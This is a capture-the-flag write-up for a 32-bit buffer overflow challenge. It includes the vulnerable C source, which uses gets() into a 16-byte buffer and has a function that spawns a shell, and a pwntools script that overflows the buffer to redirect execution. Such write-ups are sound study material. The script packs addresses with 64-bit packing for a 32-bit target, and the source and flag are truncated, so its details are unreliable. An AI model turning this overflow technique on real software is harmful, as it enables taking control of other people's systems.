Baby Buffer Overflow - 32bit

Author: @aenygma Can you command this program to where it cannot go? To get the flag, you must somehow take control of its excecution. Is it even possible?

Here I am given 2 files. First is a C file and the other one is the compiled binary. The content of the files are as follows:

17KB

babybufov

Open

#include <stdio.h>
#include <unistd.h>

//gcc -fno-pie -no-pie -Wno-implicit-function-declaration -fno-stack-protector -m32 babybufov.c -o babybufov

void target(){
    puts("Jackpot!");
    char* executable="/bin/bash";
    char* argv[]={executable, NULL};
    execve(executable,argv,NULL);
}

int vuln(){
    char buf[16];
    gets(buf);
    return 0;
}

int main(){
    setbuf(stdin,NULL);
    setbuf(stdout,NULL);
    puts("Gimme some data!");
    fflush(stdout);
    vuln();
    puts("Failed... :(");

So first things first, I saw that there was no canary and no PIE, thus there will be no offset

Since this challenge was a basic ret2win, I decided to look through some writeups. After looking through a few writeups, some of the following being

CARS | ctf thingysriantheduckquack.gitbook.io

ret2win | Cybersecurity Notesir0nstone.gitbook.io

I used them to create my own script that I could use to solve this challenge.

By seeing that the ret function is at the address 0x08049006, I created up a script that would help me solve this challenge. The payload would A * 20 as 16 is for the input and 4 is for the 32 bit ret.

from pwn import *
context.binary = binary = ELF("babybufov")

# p = process()
p = remote('challenge.ctf.games', 30693)

hidden_function = p64(binary.symbols.target)
payload = b'A' * 20 + p64(0x08049006) + hidden_function 

p.sendline(payload) 
p.interactive()

Using this, we can obtain the flag.

Thus the flag is flag{4cd3b4079393e861af489ca063373f98

PreviousBinary Exploitation NextWarmups

Last updated 1 year ago